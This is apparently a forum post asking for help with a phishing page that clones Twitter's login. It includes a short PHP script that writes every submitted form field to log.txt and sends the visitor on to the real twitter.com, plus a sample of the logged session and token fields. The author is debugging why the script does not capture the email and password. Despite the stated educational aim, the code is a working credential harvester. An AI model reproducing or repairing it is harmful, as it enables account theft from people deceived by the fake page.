我正在为计算机安全进行网络钓鱼,并且试图了解网络钓鱼如何用于教育目的。
我的index.html是twitter.com,我对其进行了编辑,以便它使用file.php而不是登录。 file.php记录用户(在本例中为我)键入的电子邮件和密码,并将其保存为log.txt,然后将用户重定向到真实的twitter.com。 但是有一个问题,它不保存电子邮件和密码,而是保存html页面中登录后的下一步内容:
session=
return_to_ssl=true
scribe_log=
redirect_after_login=/
authenticity_token=efda136fc6b4513493a115270e13f102e8bef7ef
ui_metrics={"rf":{"bunch-of-numbers+letters...
这是file.php:
<?php
header ('Location: http://www.twitter.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
出什么问题了?预先感谢。